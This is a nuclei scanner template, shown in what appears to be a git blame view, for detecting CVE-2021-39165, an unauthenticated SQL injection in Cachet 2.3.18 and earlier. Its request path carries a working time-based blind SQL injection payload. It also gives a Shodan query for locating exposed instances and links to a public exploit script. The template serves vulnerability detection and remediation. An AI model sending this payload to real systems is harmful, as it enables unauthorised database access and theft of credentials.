nuclei-templates/http/cves/2021/CVE-2021-39165.yaml

48 lines
1.9 KiB
YAML
Raw Normal View History

2022-10-06 20:20:48 +00:00
id: CVE-2021-39165
info:
2023-05-26 05:27:49 +00:00
name: Cachet <=2.3.18 - SQL Injection
2022-10-06 20:20:48 +00:00
author: tess
2023-07-11 19:49:27 +00:00
severity: medium
2022-10-06 20:20:48 +00:00
description: |
Cachet is an open source status page. With Cachet prior to and including 2.3.18, there is a SQL injection which is in the `SearchableTrait#scopeSearch()`. Attackers without authentication can utilize this vulnerability to exfiltrate sensitive data from the database such as administrator's password and session. The original repository of Cachet <https://github.com/CachetHQ/Cachet> is not active, the stable version 2.3.18 and it's developing 2.4 branch is affected.
2023-09-06 12:09:01 +00:00
remediation: |
Upgrade Cachet to a version higher than 2.3.18 or apply the necessary patches provided by the vendor.
2022-10-06 20:20:48 +00:00
reference:
- https://www.leavesongs.com/PENETRATION/cachet-from-laravel-sqli-to-bug-bounty.html
- https://github.com/fiveai/Cachet/commit/27bca8280419966ba80c6fa283d985ddffa84bb6
2023-05-26 04:58:17 +00:00
- https://github.com/W0rty/CVE-2021-39165/blob/main/exploit.py
2023-05-26 05:27:49 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2021-39165
2023-07-11 19:49:27 +00:00
- https://github.com/fiveai/Cachet/security/advisories/GHSA-79mg-4w23-4fqc
2022-10-06 20:20:48 +00:00
classification:
2023-07-11 19:49:27 +00:00
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
cvss-score: 6.5
2023-05-26 05:27:49 +00:00
cve-id: CVE-2021-39165
2023-07-11 19:49:27 +00:00
cwe-id: CWE-287
2023-08-31 11:46:18 +00:00
epss-score: 0.02927
epss-percentile: 0.89509
2023-09-06 12:09:01 +00:00
cpe: cpe:2.3:a:chachethq:cachet:*:*:*:*:*:*:*:*
2022-10-06 20:20:48 +00:00
metadata:
2023-06-04 08:13:42 +00:00
verified: true
2023-09-06 12:09:01 +00:00
max-request: 1
2023-07-11 19:49:27 +00:00
vendor: chachethq
product: cachet
2023-09-06 12:09:01 +00:00
shodan-query: http.favicon.hash:-1606065523
2023-05-26 05:27:49 +00:00
tags: cve,cve2021,cachet,sqli
2022-10-06 20:20:48 +00:00
2023-05-26 04:58:17 +00:00
http:
2022-10-06 20:20:48 +00:00
- method: GET
path:
2023-05-26 05:05:00 +00:00
- "{{BaseURL}}/api/v1/components?name=1&1%5B0%5D=&1%5B1%5D=a&1%5B2%5D=&1%5B3%5D=or+'a'='a')%20and%20(select%20sleep(6))--"
2022-10-06 20:20:48 +00:00
redirects: true
max-redirects: 2
matchers:
2023-05-26 04:58:17 +00:00
- type: dsl
dsl:
- 'duration>=6'
- 'status_code == 200'
2023-05-26 05:06:15 +00:00
- 'contains(content_type, "application/json")'
2023-05-26 05:27:49 +00:00
- 'contains(body, "pagination") && contains(body, "data")'
2022-10-06 20:20:48 +00:00
condition: and